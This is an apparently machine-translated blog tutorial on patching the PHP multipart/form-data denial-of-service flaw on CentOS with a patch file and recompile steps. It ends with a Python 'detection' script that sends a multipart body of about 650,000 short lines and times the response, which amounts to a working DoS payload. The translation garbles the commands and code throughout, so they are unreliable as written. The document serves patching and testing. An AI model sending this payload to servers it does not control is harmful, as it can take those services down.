Today in the dark clouds to see PHP multipart/form-data remote dos Vulnerability, immediately to colleagues to contact the online server to play a patch, first to a CentOS compile installation nginx+php-fpm+mysql tutorial, if it is based on my installation, Then you can go on and do it, if not, then take a look.
System: CentOS 5.x (64-bit)
Required Software: Php-5.2-multipart-form-data.patch
1. View your PHP version
Php-v
PHP 5.2.17p1 (CLI) (built:oct 29 2015 15:31:06)
Copyright (c) 1997-2010 the PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2010 Zend Technologies
If the version is higher than 5.3, you can upgrade PHP directly.
2. Download the patch file
wget Http://soft.vpser.net/web/php/bug/php-5.2-multipart-form-data.patch
Or
Wget/php_patch/php-5.2-multipart-form-data.patch
3. Install the patch
5.2:
CP Php-5.2-multipart-form-data.patch ~/install/php-5.2.17/
CD php-5.2.17
Patch-p1 < Php-5.2-multipart-form-data.patch
5.3:
wget Http://soft.vpser.net/web/php/bug/php-5.3-multipart-form-data.patch
Patch-p1 < Php-5.3-multipart-form-data.patch
Remove 42 lines to 45 lines:
If ["$php _version" = = "$old _php_version"]; Then
echo "Error:the upgrade PHP Version is the same as the old version!!"
Exit 1
Fi
4. Re-compile PHP
./configure--prefix=/usr/local/php--enable-fastcgi--enable-fpm--with-fpm-log=/var/log/php-fpm.log \
--with-fpm-conf=/etc/php-fpm.conf--with-fpm-pid=/var/run/php-fpm.pid--with-config-file-path=/etc \
--WITH-CONFIG-FILE-SCAN-DIR=/ETC/PHP.D--with-openssl--with-zlib--enable-bcmath--with-bz2--with-curl \
--enable-ftp--with-gd--enable-gd-native-ttf--with-jpeg-dir--with-png-dir--with-gettext \
--enable-mbstring--with-mcrypt--enable-soap--enable-zip--with-iconv=/usr/local/libiconv \
--with-mysql=/usr/local/mysql--with-mysqli=/usr/local/mysql/bin/mysql_config--without-pear
PS: You'd better check your own PHP compiler parameters, Php-i|grep configure
Make && make install
All right, so we're done with the leak, so how do we detect it? See the following script:
Cat dd.py
'''
Author:shusheng liu,the Department of security Cloud, Baidu
Email:liusscs@163.com
'''
Import Sys
Import Urllib,urllib2
Import datetime
From Optparse import Optionparser
def http_proxy (Proxy_url):
Proxy_handler = Urllib2. Proxyhandler ({"http": Proxy_url})
Null_proxy_handler = Urllib2. Proxyhandler ({})
Opener = Urllib2.build_opener (Proxy_handler)
Urllib2.install_opener (opener)
#end Http_proxy
def check_php_multipartform_dos (url,post_body,headers):
req = Urllib2. Request (URL)
For key in Headers.keys ():
Req.add_header (Key,headers[key])
StartTime = Datetime.datetime.now ();
FD = Urllib2.urlopen (req,post_body)
html = Fd.read ()
Endtime = Datetime.datetime.now ()
Usetime= (endtime-starttime). seconds
if (Usetime > 5):
result = url+ ' is vulnerable ';
Else
if (Usetime > 3):
result = ' need to check normal respond time '
return [Result,usetime]
#end
def main ():
#http_proxy ("http://127.0.0.1:8089")
Parser = Optionparser ()
Parser.add_option ("T", "--target", action= "store",
Dest= "Target",
Default=false,
Type= "string",
help= "Test Target")
(options, args) = Parser.parse_args ()
if (options.target):
target = Options.target
Else
Return
num=650000
headers={' content-type ': ' multipart/form-data boundary=----webkitformboundaryx3b7rdmpcqlzmje1 ',
' accept-encoding ': ' gzip, deflate ',
' User-agent ': ' mozilla/5.0 (Windows NT 6.1; WOW64) applewebkit/537.36 (khtml, like Gecko) chrome/40.0.2214.111 safari/537.36 '}
BODY = "------webkitformboundaryx3b7rdmpcqlzmje1\ncontent-disposition:form-data; Name=\ "File\"; Filename=sp.jpg "
Payload= ""
For I in Range (0,num):
Payload = payload + "a\n"
BODY = body + payload;
BODY = body + "content-type:application/octet-stream\r\n\r\ndatadata\r\n------webkitformboundaryx3b7rdmpcqlzmje1-- "
Print "Starting ...";
Respond=check_php_multipartform_dos (Target,body,headers)
Print "Result:"
Print Respond[0]
Print "Respond Time:" +str (respond[1]) + "seconds";
If __name__== "__main__":
Main ()
This script is used for testing, and if you do bad things, it has nothing to do with this site.